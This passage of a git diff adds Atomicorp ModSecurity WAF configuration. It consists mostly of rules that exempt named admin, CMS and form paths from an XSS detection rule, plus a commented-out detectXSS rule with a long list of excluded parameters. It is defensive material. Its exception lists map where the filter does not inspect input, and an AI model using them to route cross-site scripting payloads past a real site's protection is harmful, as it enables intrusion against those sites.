+SecRule REQUEST_FILENAME "/0104_dupicate\.php" "phase:2,id:93806,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change_text\.php" "phase:2,id:93807,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0104_duplicate\.php" "phase:2,id:93808,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change\.php" "phase:2,id:93809,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/0101_change_news\.php" "phase:2,id:93810,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/reviews/uploadproduct\.php" "phase:2,id:93811,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/redaxo/index\.php" "phase:2,id:93812,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:93813,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/property-details\.php" "phase:2,id:93814,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/artikel/" "phase:2,id:93815,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editieren_grunddaten\.php" "phase:2,id:93816,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contao/main\.php" "phase:2,id:93817,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/seo-report\.php" "phase:2,id:93818,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/site_links\.php" "phase:2,id:93819,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/network/themes\.php" "phase:2,id:93820,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/previewtemplate\.php" "phase:2,id:93821,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/distributors/edit\.php" "phase:2,id:93822,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deref\.php" "phase:2,id:93823,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/gr_radiostatus_panel/" "phase:2,id:93824,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/typo3/mod\.php" "phase:2,id:93825,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifyeventui\.php" "phase:2,id:93826,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifyeventuim\.php" "phase:2,id:93827,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deleteeventui\.php" "phase:2,id:93828,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/deleteeventuim\.php" "phase:2,id:93829,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifyblogui\.php" "phase:2,id:93830,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addmodifybloguim\.php" "phase:2,id:93831,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bug_update\.php" "phase:2,id:93832,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/func/get-members\.php" "phase:2,id:93833,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/update_page\.php" "phase:2,id:93834,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/abf-db\.php" "phase:2,id:93835,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/checkout_yourinfo\.php" "phase:2,id:93836,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adminhandler\.php" "phase:2,id:93837,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sadmin/" "phase:2,id:93838,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/editcentre\.php" "phase:2,id:93839,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/content/widget" "phase:2,id:93840,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-change_domain\.php" "phase:2,id:93841,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/pagetext/edit\.php" "phase:2,id:93842,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/actueel\.php" "phase:2,id:93843,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/cws-pb/" "phase:2,id:93844,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/public_file_edit\.php" "phase:2,id:93845,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editgall\.php" "phase:2,id:93846,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mod/quiz/" "phase:2,id:93847,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/integration/service\.php" "phase:2,id:93848,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/create_question\.php" "phase:2,id:93849,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wpfb-ajax\.php" "phase:2,id:93850,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/branding\.php" "phase:2,id:93851,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jackbox_social\.php" "phase:2,id:93852,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/customize\.php" "phase:2,id:93853,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/blog/import" "phase:2,id:93854,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/system/ajax" "phase:2,id:93855,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/prodedit\.php" "phase:2,id:93856,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cometchat/admin/" "phase:2,id:93857,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/dada/plugins/bridge\.cgi" "phase:2,id:93858,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/addcentre\.php" "phase:2,id:93859,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit_orders_tax\.php" "phase:2,id:93860,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/whmadmcp/addonmodules\.php" "phase:2,id:93861,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "property-edit-handler\.php" "phase:2,id:93862,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin_settings_save\.php" "phase:2,id:93863,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/send\.email\.do\.php" "phase:2,id:93864,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/homepage\.php" "phase:2,id:93865,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/backwpup/job/job_run\.php" "phase:2,id:93866,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/project/install/handle_ajax" "phase:2,id:93867,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cometchat_send\.php" "phase:2,id:93868,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/social_slider_panel/admin\.php" "phase:2,id:93869,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/configuressl\.php" "phase:2,id:93870,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.9.0 and up
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005-2013 by Prometheus Global, all rights reserved.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS   
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE   
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE   
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE   
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR   
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF   
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS   
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN   
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)   
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF   
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+#Bypass for special cases
+#SecRule REQUEST_URI "(?:/index\.php/(?:[a-z0-9_-]+/)+(?:rule_conditions_fieldset|newconditionhtml)|^/administrator/index\.php\?(?:option=com_(?:rsform|eshop)|format=html$)|^/index\.php/admin/easybanner_placeholder/save/|^/shop/admin/remote\.php\?remotesection=orders&w=editordersavebillingeddress|^/admin\.php\?(?:s=[a-z0-9]+&d=[a-z]+&c=content_|p=product_process)|^/?[a-z0-9\./]{0,}admin/[a-z0-9_]+/[0-9]+/(?:edit|add)|^/admin/config/media/colorbox|^/backoffice/index\.php\?controller=admintranslations|^/index\.php/admin/promo_quote/newactionhtml|^/[a-z_]+/index\.php\?s=[a-z0-9]+&d=cp&c=content_publish|^/wp-admin/network/admin\.php\?page=events-manager-options|^/file/ajax/|^/index\.php/treelogin/|^/([a-z]+/)?index\.php/admin/catalog_product|^(?:[a-z0-9_-]+/)+wp-comments-post\.php\?for=jetpack|^/[a-z0-9/]+admin/[a-z0-9/]+edit/)" #  phase:2,pass,t:none,t:lowercase,rev:8,id:346947,nolog,skipAfter:END_DETECT_ADV_XSS
+
+#SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:addthis|!ARGS:/go_code/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:eingabe|!ARGS:ausgabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/field_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:/^texte$/|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/^instance/|!ARGS:/customfield/|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/keycaptcha_code/|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:/adsense/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:tracking_code|!ARGS:whats-new|!ARGS:analyticscode|!ARGS:top_news|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/script/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:match_report|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:vgo_ee|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:text|!ARGS:txt|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "@detectXSS" #"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:341256,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Possible Cross Site Scripting attack (detectXSS)',auditlog,log,logdata:'%{TX.0},%{matched_var_name}'"
+
+SecMarker END_DETECT_ADV_XSS
diff --git a/nginx-waf/12_asl_adv_xss_rules.conf b/nginx-waf/12_asl_adv_xss_rules.conf
new file mode 100644
index 0000000..66e4eb1
--- /dev/null
+++ b/nginx-waf/12_asl_adv_xss_rules.conf
@@ -0,0 +1,2462 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "/modules\.php" "phase:2,id:93871,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/installatron/index\.cgi" "phase:2,id:93872,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin\.php" "phase:2,id:93873,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cpinquiry\.php" "phase:2,id:93874,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/area/save-page\.php" "phase:2,id:93875,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/guestbook\.pl" "phase:2,id:93876,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wysiwyg/save\.php" "phase:2,id:93877,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/index\.php" "phase:2,id:93878,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/user\.php" "phase:2,id:93879,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admincp/template\.php" "phase:2,id:93880,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contact\.php" "phase:2,id:93881,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/conf\.php" "phase:2,id:93882,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/posted/edit_listing\.php" "phase:2,id:93883,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/private\.php" "phase:2,id:93884,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:93885,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/area/add-edit\.php" "phase:2,id:93886,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/links\.php" "phase:2,id:93887,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forums/newreply\.php" "phase:2,id:93888,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wysiwyg-edit" "phase:2,id:93889,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mt-comments\.cgi" "phase:2,id:93890,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax/check_mandatory_fields\.php" "phase:2,id:93891,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/dogen_display\.php" "phase:2,id:93892,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:93893,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/clients\.php" "phase:2,id:93894,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/database/dbpro\.cgi" "phase:2,id:93895,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/patch\.php" "phase:2,id:93896,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/images/logdnet\.php" "phase:2,id:93897,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contact_form\.php" "phase:2,id:93898,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/forum/register\.php" "phase:2,id:93899,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/index\.php" "phase:2,id:93900,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/class/class_add\.pl" "phase:2,id:93901,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/insert_image" "phase:2,id:93902,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administration/news\.php" "phase:2,id:93903,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/editor\.php" "phase:2,id:93904,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-sys/formmail\.cgi" "phase:2,id:93905,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/frame\.aspx" "phase:2,id:93906,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/spaw/gethref\.php" "phase:2,id:93907,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/mt/mt\.fcgi" "phase:2,id:93908,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/google_cse/google_cse\.js" "phase:2,id:93909,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/runmodule\.php" "phase:2,id:93910,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/frame\.php" "phase:2,id:93911,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/videos/install" "phase:2,id:93912,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/support/staff/index\.php" "phase:2,id:93913,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/procform\.pl" "phase:2,id:93914,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editcontent\.php" "phase:2,id:93915,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/html2rss/rss\.aspx" "phase:2,id:93916,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/winnder_step2\.1\.php" "phase:2,id:93917,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/contact/website\.php" "phase:2,id:93918,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acp/template\.php" "phase:2,id:93919,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sregister2-p\.php" "phase:2,id:93920,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/posting\.php" "phase:2,id:93921,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpmysupport/trackerimage\.php" "phase:2,id:93922,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/chat\.php" "phase:2,id:93923,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit\.php" "phase:2,id:93924,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/egroupware/etemplate/process_exec\.php" "phase:2,id:93925,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/install\.php" "phase:2,id:93926,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/acollab/install/install\.php" "phase:2,id:93927,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
